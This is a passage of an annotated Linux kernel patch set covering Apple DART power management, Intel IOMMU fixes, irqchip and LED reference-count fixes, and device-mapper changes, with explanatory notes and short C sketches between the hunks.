++static __maybe_unused int apple_dart_resume(struct device *dev)
++{
++	struct apple_dart *dart = dev_get_drvdata(dev);
++	unsigned int sid, idx;
++	int ret;
++
++	ret = apple_dart_hw_reset(dart);
++	if (ret) {
++		dev_err(dev, "Failed to reset DART on resume\n");
++		return ret;
++	}
++
++	for (sid = 0; sid < dart->num_streams; sid++) {
++		for (idx = 0; idx < DART_MAX_TTBR; idx++)
++			writel(dart->save_ttbr[sid][idx],
++			       dart->regs + DART_TTBR(sid, idx));
++		writel(dart->save_tcr[sid], dart->regs + DART_TCR(sid));
++	}
++
++	return 0;
++}
++
++DEFINE_SIMPLE_DEV_PM_OPS(apple_dart_pm_ops, apple_dart_suspend, apple_dart_resume);
++
+ static const struct of_device_id apple_dart_of_match[] = {
+ 	{ .compatible = "apple,t8103-dart", .data = &apple_dart_hw_t8103 },
+ 	{ .compatible = "apple,t6000-dart", .data = &apple_dart_hw_t6000 },
+@@ -944,6 +1051,7 @@ static struct platform_driver apple_dart_driver = {
+ 		.name			= "apple-dart",
+ 		.of_match_table		= apple_dart_of_match,
+ 		.suppress_bind_attrs    = true,
++		.pm			= pm_sleep_ptr(&apple_dart_pm_ops),
+ 	},
+ 	.probe	= apple_dart_probe,
+ 	.remove	= apple_dart_remove,
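Most of the churn in this file follows from one data-structure change: a stream map that fit in a single u64 grows into a DECLARE_BITMAP() covering up to 256 streams, with an array of atomic_long_t words where concurrent updates are needed and for_each_set_bit() for iteration. An open-coded userspace equivalent of the multi-word bitmap; the macros mirror the kernel's in simplified form:

#include <limits.h>
#include <stdio.h>

#define MAX_STREAMS	256
#define BITS_PER_LONG	(sizeof(long) * CHAR_BIT)
#define BITS_TO_LONGS(n) (((n) + BITS_PER_LONG - 1) / BITS_PER_LONG)

static void set_bit(unsigned int bit, unsigned long *map)
{
	map[bit / BITS_PER_LONG] |= 1UL << (bit % BITS_PER_LONG);
}

static int test_bit(unsigned int bit, const unsigned long *map)
{
	return !!(map[bit / BITS_PER_LONG] & (1UL << (bit % BITS_PER_LONG)));
}

int main(void)
{
	/* 256 bits need four longs on LP64; one u64 no longer fits */
	unsigned long sidmap[BITS_TO_LONGS(MAX_STREAMS)] = { 0 };
	unsigned int sid;

	set_bit(3, sidmap);
	set_bit(200, sidmap);

	/* open-coded for_each_set_bit() over the whole map */
	for (sid = 0; sid < MAX_STREAMS; sid++)
		if (test_bit(sid, sidmap))
			printf("stream %u enabled\n", sid);
	return 0;
}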
+diff --git a/drivers/iommu/intel/iommu.c b/drivers/iommu/intel/iommu.c
+index 644ca49e8cf80..d4b5d20bd6dda 100644
+--- a/drivers/iommu/intel/iommu.c
++++ b/drivers/iommu/intel/iommu.c
+@@ -4051,7 +4051,8 @@ int __init intel_iommu_init(void)
+ 		 * is likely to be much lower than the overhead of synchronizing
+ 		 * the virtual and physical IOMMU page-tables.
+ 		 */
+-		if (cap_caching_mode(iommu->cap)) {
++		if (cap_caching_mode(iommu->cap) &&
++		    !first_level_by_default(IOMMU_DOMAIN_DMA)) {
+ 			pr_info_once("IOMMU batching disallowed due to virtualization\n");
+ 			iommu_set_dma_strict();
+ 		}
+@@ -4358,7 +4359,12 @@ static size_t intel_iommu_unmap(struct iommu_domain *domain,
+ 	if (dmar_domain->max_addr == iova + size)
+ 		dmar_domain->max_addr = iova;
+ 
+-	iommu_iotlb_gather_add_page(domain, gather, iova, size);
++	/*
++	 * We do not use page-selective IOTLB invalidation in flush queue,
++	 * so there is no need to track page and sync iotlb.
++	 */
++	if (!iommu_iotlb_gather_queued(gather))
++		iommu_iotlb_gather_add_page(domain, gather, iova, size);
+ 
+ 	return size;
+ }
+@@ -4636,8 +4642,12 @@ static int intel_iommu_enable_sva(struct device *dev)
+ 		return -EINVAL;
+ 
+ 	ret = iopf_queue_add_device(iommu->iopf_queue, dev);
+-	if (!ret)
+-		ret = iommu_register_device_fault_handler(dev, iommu_queue_iopf, dev);
++	if (ret)
++		return ret;
++
++	ret = iommu_register_device_fault_handler(dev, iommu_queue_iopf, dev);
++	if (ret)
++		iopf_queue_remove_device(iommu->iopf_queue, dev);
+ 
+ 	return ret;
+ }
+@@ -4649,8 +4659,12 @@ static int intel_iommu_disable_sva(struct device *dev)
+ 	int ret;
+ 
+ 	ret = iommu_unregister_device_fault_handler(dev);
+-	if (!ret)
+-		ret = iopf_queue_remove_device(iommu->iopf_queue, dev);
++	if (ret)
++		return ret;
++
++	ret = iopf_queue_remove_device(iommu->iopf_queue, dev);
++	if (ret)
++		iommu_register_device_fault_handler(dev, iommu_queue_iopf, dev);
+ 
+ 	return ret;
+ }
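
The two SVA hunks above replace "chain the second step on success" with early returns plus explicit rollback, so a failure in the second step cannot leave a half-registered device behind. The general shape, sketched with hypothetical step_a()/step_b() helpers:

        static int enable_feature(struct device *dev)
        {
                int ret;

                ret = step_a(dev);
                if (ret)
                        return ret;

                ret = step_b(dev);
                if (ret)
                        undo_step_a(dev);       /* unwind on failure */

                return ret;
        }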
+diff --git a/drivers/iommu/intel/pasid.c b/drivers/iommu/intel/pasid.c
+index e13d7e5273e19..a39aab66a01b1 100644
+--- a/drivers/iommu/intel/pasid.c
++++ b/drivers/iommu/intel/pasid.c
+@@ -126,6 +126,9 @@ int intel_pasid_alloc_table(struct device *dev)
+ 	pasid_table->max_pasid = 1 << (order + PAGE_SHIFT + 3);
+ 	info->pasid_table = pasid_table;
+ 
++	if (!ecap_coherent(info->iommu->ecap))
++		clflush_cache_range(pasid_table->table, size);
++
+ 	return 0;
+ }
+ 
+@@ -213,6 +216,10 @@ retry:
+ 			free_pgtable_page(entries);
+ 			goto retry;
+ 		}
++		if (!ecap_coherent(info->iommu->ecap)) {
++			clflush_cache_range(entries, VTD_PAGE_SIZE);
++			clflush_cache_range(&dir[dir_index].val, sizeof(*dir));
++		}
+ 	}
+ 
+ 	return &entries[index];
+@@ -362,6 +369,16 @@ static inline void pasid_set_page_snoop(struct pasid_entry *pe, bool value)
+ 	pasid_set_bits(&pe->val[1], 1 << 23, value << 23);
+ }
+ 
++/*
++ * Setup No Execute Enable bit (Bit 133) of a scalable mode PASID
++ * entry. It is required when XD bit of the first level page table
++ * entry is about to be set.
++ */
++static inline void pasid_set_nxe(struct pasid_entry *pe)
++{
++	pasid_set_bits(&pe->val[2], 1 << 5, 1 << 5);
++}
++
+ /*
+  * Setup the Page Snoop (PGSNP) field (Bit 88) of a scalable mode
+  * PASID entry.
+@@ -555,6 +572,7 @@ int intel_pasid_setup_first_level(struct intel_iommu *iommu,
+ 	pasid_set_domain_id(pte, did);
+ 	pasid_set_address_width(pte, iommu->agaw);
+ 	pasid_set_page_snoop(pte, !!ecap_smpwc(iommu->ecap));
++	pasid_set_nxe(pte);
+ 
+ 	/* Setup Present and PASID Granular Transfer Type: */
+ 	pasid_set_translation_type(pte, PASID_ENTRY_PGTT_FL_ONLY);
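
Two independent fixes land here: PASID table and directory entries are flushed out of the CPU cache whenever the IOMMU reports itself non-coherent (ecap_coherent() clear), and the NXE bit is set so the XD bit in first-level page tables is honored. The flush-after-update discipline, as a sketch with a hypothetical publish_desc() helper:

        /* Publish a descriptor that the IOMMU will fetch via DMA. */
        static void publish_desc(struct intel_iommu *iommu, u64 *entry, u64 val)
        {
                WRITE_ONCE(*entry, val);
                if (!ecap_coherent(iommu->ecap))
                        clflush_cache_range(entry, sizeof(*entry));
        }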
+diff --git a/drivers/iommu/iommu.c b/drivers/iommu/iommu.c
+index 959d895fc1dff..fd8c8aeb3c504 100644
+--- a/drivers/iommu/iommu.c
++++ b/drivers/iommu/iommu.c
+@@ -749,12 +749,16 @@ struct iommu_group *iommu_group_alloc(void)
+ 
+ 	ret = iommu_group_create_file(group,
+ 				      &iommu_group_attr_reserved_regions);
+-	if (ret)
++	if (ret) {
++		kobject_put(group->devices_kobj);
+ 		return ERR_PTR(ret);
++	}
+ 
+ 	ret = iommu_group_create_file(group, &iommu_group_attr_type);
+-	if (ret)
++	if (ret) {
++		kobject_put(group->devices_kobj);
+ 		return ERR_PTR(ret);
++	}
+ 
+ 	pr_debug("Allocated group %d\n", group->id);
+ 
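
iommu_group_alloc() already holds a reference on group->devices_kobj from the earlier kobject setup, so both sysfs-file error paths must drop it; otherwise the group's release() callback never runs and the allocation leaks. The pattern, reduced to a sketch:

        ret = iommu_group_create_file(group, attr);
        if (ret) {
                /* Drop our ref; release() frees the group. */
                kobject_put(group->devices_kobj);
                return ERR_PTR(ret);
        }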
+diff --git a/drivers/irqchip/irq-alpine-msi.c b/drivers/irqchip/irq-alpine-msi.c
+index 5ddb8e578ac6a..fc1ef7de37973 100644
+--- a/drivers/irqchip/irq-alpine-msi.c
++++ b/drivers/irqchip/irq-alpine-msi.c
+@@ -199,6 +199,7 @@ static int alpine_msix_init_domains(struct alpine_msix_data *priv,
+ 	}
+ 
+ 	gic_domain = irq_find_host(gic_node);
++	of_node_put(gic_node);
+ 	if (!gic_domain) {
+ 		pr_err("Failed to find the GIC domain\n");
+ 		return -ENXIO;
+diff --git a/drivers/irqchip/irq-bcm7120-l2.c b/drivers/irqchip/irq-bcm7120-l2.c
+index bb6609cebdbce..1e9dab6e0d86f 100644
+--- a/drivers/irqchip/irq-bcm7120-l2.c
++++ b/drivers/irqchip/irq-bcm7120-l2.c
+@@ -279,7 +279,8 @@ static int __init bcm7120_l2_intc_probe(struct device_node *dn,
+ 		flags |= IRQ_GC_BE_IO;
+ 
+ 	ret = irq_alloc_domain_generic_chips(data->domain, IRQS_PER_WORD, 1,
+-				dn->full_name, handle_level_irq, clr, 0, flags);
++				dn->full_name, handle_level_irq, clr,
++				IRQ_LEVEL, flags);
+ 	if (ret) {
+ 		pr_err("failed to allocate generic irq chip\n");
+ 		goto out_free_domain;
+diff --git a/drivers/irqchip/irq-brcmstb-l2.c b/drivers/irqchip/irq-brcmstb-l2.c
+index e4efc08ac5948..091b0fe7e3242 100644
+--- a/drivers/irqchip/irq-brcmstb-l2.c
++++ b/drivers/irqchip/irq-brcmstb-l2.c
+@@ -161,6 +161,7 @@ static int __init brcmstb_l2_intc_of_init(struct device_node *np,
+ 					  *init_params)
+ {
+ 	unsigned int clr = IRQ_NOREQUEST | IRQ_NOPROBE | IRQ_NOAUTOEN;
++	unsigned int set = 0;
+ 	struct brcmstb_l2_intc_data *data;
+ 	struct irq_chip_type *ct;
+ 	int ret;
+@@ -208,9 +209,12 @@ static int __init brcmstb_l2_intc_of_init(struct device_node *np,
+ 	if (IS_ENABLED(CONFIG_MIPS) && IS_ENABLED(CONFIG_CPU_BIG_ENDIAN))
+ 		flags |= IRQ_GC_BE_IO;
+ 
++	if (init_params->handler == handle_level_irq)
++		set |= IRQ_LEVEL;
++
+ 	/* Allocate a single Generic IRQ chip for this node */
+ 	ret = irq_alloc_domain_generic_chips(data->domain, 32, 1,
+-			np->full_name, init_params->handler, clr, 0, flags);
++			np->full_name, init_params->handler, clr, set, flags);
+ 	if (ret) {
+ 		pr_err("failed to allocate generic irq chip\n");
+ 		goto out_free_domain;
+diff --git a/drivers/irqchip/irq-mvebu-gicp.c b/drivers/irqchip/irq-mvebu-gicp.c
+index fe88a782173dd..c43a345061d53 100644
+--- a/drivers/irqchip/irq-mvebu-gicp.c
++++ b/drivers/irqchip/irq-mvebu-gicp.c
+@@ -221,6 +221,7 @@ static int mvebu_gicp_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	parent_domain = irq_find_host(irq_parent_dn);
++	of_node_put(irq_parent_dn);
+ 	if (!parent_domain) {
+ 		dev_err(&pdev->dev, "failed to find parent IRQ domain\n");
+ 		return -ENODEV;
+diff --git a/drivers/irqchip/irq-ti-sci-intr.c b/drivers/irqchip/irq-ti-sci-intr.c
+index fe8fad22bcf96..020ddf29efb80 100644
+--- a/drivers/irqchip/irq-ti-sci-intr.c
++++ b/drivers/irqchip/irq-ti-sci-intr.c
+@@ -236,6 +236,7 @@ static int ti_sci_intr_irq_domain_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	parent_domain = irq_find_host(parent_node);
++	of_node_put(parent_node);
+ 	if (!parent_domain) {
+ 		dev_err(dev, "Failed to find IRQ parent domain\n");
+ 		return -ENODEV;
+diff --git a/drivers/irqchip/irqchip.c b/drivers/irqchip/irqchip.c
+index 3570f0a588c4b..7899607fbee8d 100644
+--- a/drivers/irqchip/irqchip.c
++++ b/drivers/irqchip/irqchip.c
+@@ -38,8 +38,10 @@ int platform_irqchip_probe(struct platform_device *pdev)
+ 	struct device_node *par_np = of_irq_find_parent(np);
+ 	of_irq_init_cb_t irq_init_cb = of_device_get_match_data(&pdev->dev);
+ 
+-	if (!irq_init_cb)
++	if (!irq_init_cb) {
++		of_node_put(par_np);
+ 		return -EINVAL;
++	}
+ 
+ 	if (par_np == np)
+ 		par_np = NULL;
+@@ -52,8 +54,10 @@ int platform_irqchip_probe(struct platform_device *pdev)
+ 	 * interrupt controller. The actual initialization callback of this
+ 	 * interrupt controller can check for specific domains as necessary.
+ 	 */
+-	if (par_np && !irq_find_matching_host(par_np, DOMAIN_BUS_ANY))
++	if (par_np && !irq_find_matching_host(par_np, DOMAIN_BUS_ANY)) {
++		of_node_put(par_np);
+ 		return -EPROBE_DEFER;
++	}
+ 
+ 	return irq_init_cb(np, par_np);
+ }
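
The irqchip fixes in this batch all balance device-tree node references: of_irq_find_parent() and the of_parse_phandle()-style lookups return a node with an elevated refcount, and every exit path, including early errors, must of_node_put() it. Sketch of the discipline once the node itself is no longer needed:

        struct device_node *parent = of_irq_find_parent(np); /* +1 ref */
        struct irq_domain *domain = irq_find_host(parent);

        of_node_put(parent);            /* done with the node itself */
        if (!domain)
                return -EPROBE_DEFER;   /* no leak on the error path */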
+diff --git a/drivers/leds/led-class.c b/drivers/leds/led-class.c
+index 6a8ea94834fa3..aa39b2a48fdff 100644
+--- a/drivers/leds/led-class.c
++++ b/drivers/leds/led-class.c
+@@ -235,14 +235,17 @@ struct led_classdev *of_led_get(struct device_node *np, int index)
+ 
+ 	led_dev = class_find_device_by_of_node(leds_class, led_node);
+ 	of_node_put(led_node);
++	put_device(led_dev);
+ 
+ 	if (!led_dev)
+ 		return ERR_PTR(-EPROBE_DEFER);
+ 
+ 	led_cdev = dev_get_drvdata(led_dev);
+ 
+-	if (!try_module_get(led_cdev->dev->parent->driver->owner))
++	if (!try_module_get(led_cdev->dev->parent->driver->owner)) {
++		put_device(led_cdev->dev);
+ 		return ERR_PTR(-ENODEV);
++	}
+ 
+ 	return led_cdev;
+ }
+@@ -255,6 +258,7 @@ EXPORT_SYMBOL_GPL(of_led_get);
+ void led_put(struct led_classdev *led_cdev)
+ {
+ 	module_put(led_cdev->dev->parent->driver->owner);
++	put_device(led_cdev->dev);
+ }
+ EXPORT_SYMBOL_GPL(led_put);
+ 
+diff --git a/drivers/leds/leds-is31fl319x.c b/drivers/leds/leds-is31fl319x.c
+index b2f4c4ec7c567..7c908414ac7e0 100644
+--- a/drivers/leds/leds-is31fl319x.c
++++ b/drivers/leds/leds-is31fl319x.c
+@@ -495,6 +495,11 @@ static inline int is31fl3196_db_to_gain(u32 dezibel)
+ 	return dezibel / IS31FL3196_AUDIO_GAIN_DB_STEP;
+ }
+ 
++static void is31f1319x_mutex_destroy(void *lock)
++{
++	mutex_destroy(lock);
++}
++
+ static int is31fl319x_probe(struct i2c_client *client)
+ {
+ 	struct is31fl319x_chip *is31;
+@@ -511,7 +516,7 @@ static int is31fl319x_probe(struct i2c_client *client)
+ 		return -ENOMEM;
+ 
+ 	mutex_init(&is31->lock);
+-	err = devm_add_action(dev, (void (*)(void *))mutex_destroy, &is31->lock);
++	err = devm_add_action_or_reset(dev, is31f1319x_mutex_destroy, &is31->lock);
+ 	if (err)
+ 		return err;
+ 
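
Casting mutex_destroy() to void (*)(void *) makes an indirect call through a mismatched function type, which trips kernel CFI; the fix adds a correctly typed wrapper. Switching to devm_add_action_or_reset() additionally runs the cleanup immediately if registering the action itself fails. The idiom, with hypothetical foo_* names:

        static void foo_mutex_destroy(void *lock)  /* devm-compatible type */
        {
                mutex_destroy(lock);
        }

        /* in probe: */
        mutex_init(&priv->lock);
        err = devm_add_action_or_reset(dev, foo_mutex_destroy, &priv->lock);
        if (err)
                return err;     /* action already ran; nothing to unwind */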
+diff --git a/drivers/leds/simple/simatic-ipc-leds-gpio.c b/drivers/leds/simple/simatic-ipc-leds-gpio.c
+index 07f0d79d604d4..e8d329b5a68c3 100644
+--- a/drivers/leds/simple/simatic-ipc-leds-gpio.c
++++ b/drivers/leds/simple/simatic-ipc-leds-gpio.c
+@@ -77,6 +77,8 @@ static int simatic_ipc_leds_gpio_probe(struct platform_device *pdev)
+ 
+ 	switch (plat->devmode) {
+ 	case SIMATIC_IPC_DEVICE_127E:
++		if (!IS_ENABLED(CONFIG_PINCTRL_BROXTON))
++			return -ENODEV;
+ 		simatic_ipc_led_gpio_table = &simatic_ipc_led_gpio_table_127e;
+ 		break;
+ 	case SIMATIC_IPC_DEVICE_227G:
+diff --git a/drivers/md/dm-bufio.c b/drivers/md/dm-bufio.c
+index bb786c39545ec..19caaf684ee34 100644
+--- a/drivers/md/dm-bufio.c
++++ b/drivers/md/dm-bufio.c
+@@ -1833,7 +1833,7 @@ struct dm_bufio_client *dm_bufio_client_create(struct block_device *bdev, unsign
+ 	c->shrinker.scan_objects = dm_bufio_shrink_scan;
+ 	c->shrinker.seeks = 1;
+ 	c->shrinker.batch = 0;
+-	r = register_shrinker(&c->shrinker, "md-%s:(%u:%u)", slab_name,
++	r = register_shrinker(&c->shrinker, "dm-bufio:(%u:%u)",
+ 			      MAJOR(bdev->bd_dev), MINOR(bdev->bd_dev));
+ 	if (r)
+ 		goto bad;
+diff --git a/drivers/md/dm-cache-background-tracker.c b/drivers/md/dm-cache-background-tracker.c
+index 84814e819e4c3..7887f99b82bd5 100644
+--- a/drivers/md/dm-cache-background-tracker.c
++++ b/drivers/md/dm-cache-background-tracker.c
+@@ -60,6 +60,14 @@ EXPORT_SYMBOL_GPL(btracker_create);
+ 
+ void btracker_destroy(struct background_tracker *b)
+ {
++	struct bt_work *w, *tmp;
++
++	BUG_ON(!list_empty(&b->issued));
++	list_for_each_entry_safe (w, tmp, &b->queued, list) {
++		list_del(&w->list);
++		kmem_cache_free(b->work_cache, w);
++	}
++
+ 	kmem_cache_destroy(b->work_cache);
+ 	kfree(b);
+ }
+diff --git a/drivers/md/dm-cache-target.c b/drivers/md/dm-cache-target.c
+index 5e92fac90b675..17fde3e5a1f7b 100644
+--- a/drivers/md/dm-cache-target.c
++++ b/drivers/md/dm-cache-target.c
+@@ -1805,6 +1805,7 @@ static void process_deferred_bios(struct work_struct *ws)
+ 
+ 		else
+ 			commit_needed = process_bio(cache, bio) || commit_needed;
++		cond_resched();
+ 	}
+ 
+ 	if (commit_needed)
+@@ -1827,6 +1828,7 @@ static void requeue_deferred_bios(struct cache *cache)
+ 	while ((bio = bio_list_pop(&bios))) {
+ 		bio->bi_status = BLK_STS_DM_REQUEUE;
+ 		bio_endio(bio);
++		cond_resched();
+ 	}
+ }
+ 
+@@ -1867,6 +1869,8 @@ static void check_migrations(struct work_struct *ws)
+ 		r = mg_start(cache, op, NULL);
+ 		if (r)
+ 			break;
++
++		cond_resched();
+ 	}
+ }
+ 
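
The cond_resched() calls sprinkled through these dm worker loops share one rationale: under heavy I/O the deferred-bio and cell lists can grow very long, and without a reschedule point a non-preemptible kernel can stall other work on that CPU. The shape, with a hypothetical handle() step:

        while ((bio = bio_list_pop(&bios))) {
                handle(bio);            /* per-item work, possibly slow */
                cond_resched();         /* yield between items */
        }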
+diff --git a/drivers/md/dm-flakey.c b/drivers/md/dm-flakey.c
+index 89fa7a68c6c42..335684a1aeaa5 100644
+--- a/drivers/md/dm-flakey.c
++++ b/drivers/md/dm-flakey.c
+@@ -303,9 +303,13 @@ static void corrupt_bio_data(struct bio *bio, struct flakey_c *fc)
+ 	 */
+ 	bio_for_each_segment(bvec, bio, iter) {
+ 		if (bio_iter_len(bio, iter) > corrupt_bio_byte) {
+-			char *segment = (page_address(bio_iter_page(bio, iter))
+-					 + bio_iter_offset(bio, iter));
++			char *segment;
++			struct page *page = bio_iter_page(bio, iter);
++			if (unlikely(page == ZERO_PAGE(0)))
++				break;
++			segment = bvec_kmap_local(&bvec);
+ 			segment[corrupt_bio_byte] = fc->corrupt_bio_value;
++			kunmap_local(segment);
+ 			DMDEBUG("Corrupting data bio=%p by writing %u to byte %u "
+ 				"(rw=%c bi_opf=%u bi_sector=%llu size=%u)\n",
+ 				bio, fc->corrupt_bio_value, fc->corrupt_bio_byte,
+@@ -361,9 +365,11 @@ static int flakey_map(struct dm_target *ti, struct bio *bio)
+ 		/*
+ 		 * Corrupt matching writes.
+ 		 */
+-		if (fc->corrupt_bio_byte && (fc->corrupt_bio_rw == WRITE)) {
+-			if (all_corrupt_bio_flags_match(bio, fc))
+-				corrupt_bio_data(bio, fc);
++		if (fc->corrupt_bio_byte) {
++			if (fc->corrupt_bio_rw == WRITE) {
++				if (all_corrupt_bio_flags_match(bio, fc))
++					corrupt_bio_data(bio, fc);
++			}
+ 			goto map_bio;
+ 		}
+ 
+@@ -389,13 +395,14 @@ static int flakey_end_io(struct dm_target *ti, struct bio *bio,
+ 		return DM_ENDIO_DONE;
+ 
+ 	if (!*error && pb->bio_submitted && (bio_data_dir(bio) == READ)) {
+-		if (fc->corrupt_bio_byte && (fc->corrupt_bio_rw == READ) &&
+-		    all_corrupt_bio_flags_match(bio, fc)) {
+-			/*
+-			 * Corrupt successful matching READs while in down state.
+-			 */
+-			corrupt_bio_data(bio, fc);
+-
++		if (fc->corrupt_bio_byte) {
++			if ((fc->corrupt_bio_rw == READ) &&
++			    all_corrupt_bio_flags_match(bio, fc)) {
++				/*
++				 * Corrupt successful matching READs while in down state.
++				 */
++				corrupt_bio_data(bio, fc);
++			}
+ 		} else if (!test_bit(DROP_WRITES, &fc->flags) &&
+ 			   !test_bit(ERROR_WRITES, &fc->flags)) {
+ 			/*
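
The corruption path used to compute page_address() plus the bvec offset, which is wrong for highmem pages; it also wrote into the shared zero page for zero-filled bios. The fix skips ZERO_PAGE(0) and goes through the local kmap API. Highmem-safe access to a bvec payload, sketched for a struct bio_vec from bio_for_each_segment():

        char *p = bvec_kmap_local(&bvec);  /* maps highmem when needed */
        p[corrupt_byte] = value;
        kunmap_local(p);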
+diff --git a/drivers/md/dm-ioctl.c b/drivers/md/dm-ioctl.c
+index 3bfc1583c20a2..fdb7846a97a40 100644
+--- a/drivers/md/dm-ioctl.c
++++ b/drivers/md/dm-ioctl.c
+@@ -482,7 +482,7 @@ static struct mapped_device *dm_hash_rename(struct dm_ioctl *param,
+ 		dm_table_event(table);
+ 	dm_put_live_table(hc->md, srcu_idx);
+ 
+-	if (!dm_kobject_uevent(hc->md, KOBJ_CHANGE, param->event_nr))
++	if (!dm_kobject_uevent(hc->md, KOBJ_CHANGE, param->event_nr, false))
+ 		param->flags |= DM_UEVENT_GENERATED_FLAG;
+ 
+ 	md = hc->md;
+@@ -995,7 +995,7 @@ static int dev_remove(struct file *filp, struct dm_ioctl *param, size_t param_si
+ 
+ 	dm_ima_measure_on_device_remove(md, false);
+ 
+-	if (!dm_kobject_uevent(md, KOBJ_REMOVE, param->event_nr))
++	if (!dm_kobject_uevent(md, KOBJ_REMOVE, param->event_nr, false))
+ 		param->flags |= DM_UEVENT_GENERATED_FLAG;
+ 
+ 	dm_put(md);
+@@ -1129,6 +1129,7 @@ static int do_resume(struct dm_ioctl *param)
+ 	struct hash_cell *hc;
+ 	struct mapped_device *md;
+ 	struct dm_table *new_map, *old_map = NULL;
++	bool need_resize_uevent = false;
+ 
+ 	down_write(&_hash_lock);
+ 
+@@ -1149,6 +1150,8 @@ static int do_resume(struct dm_ioctl *param)
+ 
+ 	/* Do we need to load a new map ? */
+ 	if (new_map) {
++		sector_t old_size, new_size;
++
+ 		/* Suspend if it isn't already suspended */
+ 		if (param->flags & DM_SKIP_LOCKFS_FLAG)
+ 			suspend_flags &= ~DM_SUSPEND_LOCKFS_FLAG;
+@@ -1157,6 +1160,7 @@ static int do_resume(struct dm_ioctl *param)
+ 		if (!dm_suspended_md(md))
+ 			dm_suspend(md, suspend_flags);
+ 
++		old_size = dm_get_size(md);
+ 		old_map = dm_swap_table(md, new_map);
+ 		if (IS_ERR(old_map)) {
+ 			dm_sync_table(md);
+@@ -1164,6 +1168,9 @@ static int do_resume(struct dm_ioctl *param)
+ 			dm_put(md);
+ 			return PTR_ERR(old_map);
+ 		}
++		new_size = dm_get_size(md);
++		if (old_size && new_size && old_size != new_size)
++			need_resize_uevent = true;
+ 
+ 		if (dm_table_get_mode(new_map) & FMODE_WRITE)
+ 			set_disk_ro(dm_disk(md), 0);
+@@ -1176,7 +1183,7 @@ static int do_resume(struct dm_ioctl *param)
+ 		if (!r) {
+ 			dm_ima_measure_on_device_resume(md, new_map ? true : false);
+ 
+-			if (!dm_kobject_uevent(md, KOBJ_CHANGE, param->event_nr))
++			if (!dm_kobject_uevent(md, KOBJ_CHANGE, param->event_nr, need_resize_uevent))
+ 				param->flags |= DM_UEVENT_GENERATED_FLAG;
+ 		}
+ 	}
+diff --git a/drivers/md/dm-thin.c b/drivers/md/dm-thin.c
+index 196f82559ad6b..d28c9077d6ed2 100644
+--- a/drivers/md/dm-thin.c
++++ b/drivers/md/dm-thin.c
+@@ -2207,6 +2207,7 @@ static void process_thin_deferred_bios(struct thin_c *tc)
+ 			throttle_work_update(&pool->throttle);
+ 			dm_pool_issue_prefetches(pool->pmd);
+ 		}
++		cond_resched();
+ 	}
+ 	blk_finish_plug(&plug);
+ }
+@@ -2289,6 +2290,7 @@ static void process_thin_deferred_cells(struct thin_c *tc)
+ 			else
+ 				pool->process_cell(tc, cell);
+ 		}
++		cond_resched();
+ 	} while (!list_empty(&cells));
+ }
+ 
+diff --git a/drivers/md/dm-zoned-metadata.c b/drivers/md/dm-zoned-metadata.c
+index 0278482fac94a..c795ea7da7917 100644
+--- a/drivers/md/dm-zoned-metadata.c
++++ b/drivers/md/dm-zoned-metadata.c
+@@ -2945,7 +2945,7 @@ int dmz_ctr_metadata(struct dmz_dev *dev, int num_dev,
+ 	zmd->mblk_shrinker.seeks = DEFAULT_SEEKS;
+ 
+ 	/* Metadata cache shrinker */
+-	ret = register_shrinker(&zmd->mblk_shrinker, "md-meta:(%u:%u)",
++	ret = register_shrinker(&zmd->mblk_shrinker, "dm-zoned-meta:(%u:%u)",
+ 				MAJOR(dev->bdev->bd_dev),
+ 				MINOR(dev->bdev->bd_dev));
+ 	if (ret) {
+diff --git a/drivers/md/dm.c b/drivers/md/dm.c
+index d49809e9db96e..d727ed9cd623f 100644
+--- a/drivers/md/dm.c
++++ b/drivers/md/dm.c
+@@ -231,7 +231,6 @@ out_uevent_exit:
+ 
+ static void local_exit(void)
+ {
+-	flush_scheduled_work();
+ 	destroy_workqueue(deferred_remove_workqueue);
+ 
+ 	unregister_blkdev(_major, _name);
+@@ -1021,6 +1020,7 @@ static void dm_wq_requeue_work(struct work_struct *work)
+ 		io->next = NULL;
+ 		__dm_io_complete(io, false);
+ 		io = next;
++		cond_resched();
+ 	}
+ }
+ 
+@@ -2185,10 +2185,7 @@ static struct dm_table *__bind(struct mapped_device *md, struct dm_table *t,
+ 	if (size != dm_get_size(md))
+ 		memset(&md->geometry, 0, sizeof(md->geometry));
+ 
+-	if (!get_capacity(md->disk))
+-		set_capacity(md->disk, size);
+-	else
+-		set_capacity_and_notify(md->disk, size);
++	set_capacity(md->disk, size);
+ 
+ 	dm_table_event_callback(t, event_callback, md);
+ 
+@@ -2582,6 +2579,7 @@ static void dm_wq_work(struct work_struct *work)
+ 			break;
+ 
+ 		submit_bio_noacct(bio);
++		cond_resched();
+ 	}
+ }
+ 
+@@ -2981,24 +2979,26 @@ EXPORT_SYMBOL_GPL(dm_internal_resume_fast);
+  * Event notification.
+  *---------------------------------------------------------------*/
+ int dm_kobject_uevent(struct mapped_device *md, enum kobject_action action,
+-		       unsigned cookie)
++		      unsigned cookie, bool need_resize_uevent)
+ {
+ 	int r;
+ 	unsigned noio_flag;
+ 	char udev_cookie[DM_COOKIE_LENGTH];
+-	char *envp[] = { udev_cookie, NULL };
+-
+-	noio_flag = memalloc_noio_save();
+-
+-	if (!cookie)
+-		r = kobject_uevent(&disk_to_dev(md->disk)->kobj, action);
+-	else {
++	char *envp[3] = { NULL, NULL, NULL };
++	char **envpp = envp;
++	if (cookie) {
+ 		snprintf(udev_cookie, DM_COOKIE_LENGTH, "%s=%u",
+ 			 DM_COOKIE_ENV_VAR_NAME, cookie);
+-		r = kobject_uevent_env(&disk_to_dev(md->disk)->kobj,
+-				       action, envp);
++		*envpp++ = udev_cookie;
++	}
++	if (need_resize_uevent) {
++		*envpp++ = "RESIZE=1";
+ 	}
+ 
++	noio_flag = memalloc_noio_save();
++
++	r = kobject_uevent_env(&disk_to_dev(md->disk)->kobj, action, envp);
++
+ 	memalloc_noio_restore(noio_flag);
+ 
+ 	return r;
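
dm_kobject_uevent() now builds a NULL-terminated environment array and always goes through kobject_uevent_env(), which is what lets do_resume() append RESIZE=1 when a table swap changed the device size. The construction pattern:

        char *envp[3] = { NULL, NULL, NULL };   /* two slots + terminator */
        char **e = envp;

        if (cookie)
                *e++ = udev_cookie;             /* "DM_COOKIE=<value>" */
        if (need_resize_uevent)
                *e++ = "RESIZE=1";

        kobject_uevent_env(&disk_to_dev(md->disk)->kobj, action, envp);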
+diff --git a/drivers/md/dm.h b/drivers/md/dm.h
+index 5201df03ce402..a9a3ffcad084c 100644
+--- a/drivers/md/dm.h
++++ b/drivers/md/dm.h
+@@ -203,7 +203,7 @@ int dm_get_table_device(struct mapped_device *md, dev_t dev, fmode_t mode,
